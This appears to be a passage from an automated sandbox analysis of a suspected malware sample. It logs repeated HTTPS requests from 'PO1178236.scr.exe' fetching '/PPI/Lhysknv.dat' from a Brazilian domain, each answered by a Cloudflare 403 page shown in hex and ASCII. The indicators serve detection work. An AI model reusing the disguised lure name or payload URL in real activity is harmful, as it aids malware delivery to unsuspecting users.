        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:04 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:04 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:04 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 38 37 65 39 31 38 34 32 32 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c287e918422b</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:04 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 38 37 65 39 31 38 34 32 32 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c287e918422b',t:'MTczNjQwODIyMy4wMDAwMDA='};var a
        2025-01-09 07:37:04 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        110192.168.2.949819188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:04 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:04 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:04 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:19 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FgxDKEgpofOmFUhGYdP71yLSoXox7W35uKzdb9zUfP5UM%2F8lQgKg1ZBcVBvgMmNY6Taef8KR3y0PcoW%2BJUzQr0I8RIeMa96b0nX8S3Y7QJ%2FpIpKi%2F%2FIyLY796O%2BtMmpBM7eB27qX7Aus%2B6V"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c28b9ad0729b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1962&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1431372&cwnd=250&unsent_bytes=0&cid=6c2291379b6a8c22&ts=131&x=0"
        2025-01-09 07:37:04 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:04 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:37:04 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:37:04 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 38 62 39 61 64 30 37 32 39 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c28b9ad0729b</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:37:04 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 38 62 39 61 64 30 37 32 39 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 43 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c28b9ad0729b',t:'MTczNjQwODIyNC4wMDAwMD
        2025-01-09 07:37:04 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        111192.168.2.949820188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:05 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:05 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:20 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GytLIhIxLNsIn2uVhFbo1236H%2FqsxtI1on1ISDLxqLyw7J%2FO%2F4oaCh1mICF3AhcWUsXNOLHbstmoFON%2BJcVahctLLUOsLlSRZWhdNbv%2F6LrT2HW6WC91ran3ANVDvr5Kag2T5T0GIn%2FlUnq5"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c28f4fb443c3-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2029&rtt_var=810&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1439132&cwnd=211&unsent_bytes=0&cid=0e8b2d77a7c2cbdc&ts=139&x=0"
        2025-01-09 07:37:05 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:05 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:37:05 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:37:05 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 38 66 34 66 62 34 34 33 63 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c28f4fb443c3</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:37:05 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 38 66 34 66 62 34 34 33 63 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c28f4fb443c3',t:'MTczNjQwODIyNS4wMDAwMDA='}
        2025-01-09 07:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        112192.168.2.949821188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:05 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:05 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:20 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7doK3OW1D9bptHv1QP%2B0Q5YO6PJqBHTNFmAD8aV%2BQ5rNGSZqxr0IToSM7DNZtHJH3qHX1Z3EQOJmN%2BT6rI41FKkYXoJUMnxYYxZFVPZ9kR8AH8ge36vWlrn0iOoDFLYhVS%2FVanTIgNSqQoUH"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2933f9243d9-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1586&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1746411&cwnd=221&unsent_bytes=0&cid=48a2816a4bd230f9&ts=134&x=0"
        2025-01-09 07:37:05 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:05 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
